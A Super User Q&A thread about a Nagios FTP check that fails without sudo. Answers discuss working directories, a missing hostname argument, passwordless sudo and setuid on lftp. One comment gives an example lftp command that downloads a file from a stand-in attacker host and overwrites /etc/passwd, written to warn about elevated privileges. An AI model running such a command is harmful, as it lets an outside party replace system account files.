# How to run command without "sudo"?

Tags: linux, debian, sudo, debian-wheezy

Nagios on my server isn't working properly. It can't execute command lftp without "sudo". Is there a way how to allow nagios run commands without using "sudo"?

My `/etc/group`: `nagios:x:107:www-data,nagios`

Script using lftp: `-rwxr-xr-x 1 root nagios 3667 říj 20 12:20 check_ftp_fully`

`/usr/bin/lftp`: `-rwxr-xr-x  1 root   root      924936 srp  7  2013 lftp`

Btw I've tried [this answer](https://superuser.com/questions/636726/allow-users-of-a-certain-group-to-run-a-command-without-sudo) with no success. Still doesn't work.

**EDIT**: The script is called by Nagios as `$USER5$/check_ftp_fully.sh <username> <password> <port>` . The checking script is [here](http://www.deathwing00.org/nagios/check_ftp_fully). It fails on listing a directory (`FTP check failed when trying to list the contents of a directory.`)

**EDIT2:** The Nagios problem isn't as important as the knowledge IF and HOW can I run commands without "sudo ". E.g. `mkdir` in `/etc`

Comment: Two critical bits of information are missing:
1) How `lftp` is being called?  The most interesting part is if you're using the full path to the binary of not.
2) How precisely does it fail?

Comment: As you describe calling of the script in your question you omitted the fourth parameter - hostname (in the script: `HOSTNAME=${4}`). Without this parameter `lftp` could certainly fail and the result of such a failure in `check_ftp_fully.sh` is writing of the message `CRITICAL: FTP check failed when trying to list the contents of a directory.`

Answer (score 2):

> The script is called by Nagios as ./check_ftp_fully.sh

The leading `./` here suggests that you are running the script from the directory where the script lives. I am speculating that you do not have write access to this directory (as indeed you should not). Change the invoking script so that it runs in your home directory (or, say, `/tmp`) with a full path to the `check_ftp_fully.sh` script instead. Better yet, or even in addition, change the test script so that it creates a temporary directory, and removes it when it's done (even in the case of e.g. a syntax error; see `trap`)

Comment: +1 for your good observation, I've created $USER5$ (path variable) and used it, unfortunately it's still not the answer to my main question.

Answer (score 1):

there might be several solutions

1. either enable nagios in sudoers file to run sudo without password confirmation and from check_ftp_fully run the 'sudo lftp'
2. setuid on lftp

both can be a security breach, this is up to you which doors you want to open :)

Comment: Why are you suggesting root privileges to `lftp`? The program normally does not need them.

Comment: The lftp itself doesn't need the root privileges, this is only if needs to access protected files, or to write in folders where a "normal" user shouldn't.

Comment: I understand your concern @pabouk, as I said, this can be a huge security breach
Imagine this command on elevated lftp:
lftp -e 'set net:timeout 10; get passwd -o /etc/passwd; bye' -u user,password hackers.com

Comment: In similar situations (like writing to a directory with limited access rights) it is certainly better to download to a temporary location and elevate the privileges only for moving of the file to the restricted location. --- but anyway in this question I think that the problem could be in a missing parameter. I checked the script. See [my comment](http://superuser.com/questions/828919/how-to-run-command-without-sudo/828921?noredirect=1#comment1122409_828919).

Comment: You're right! :)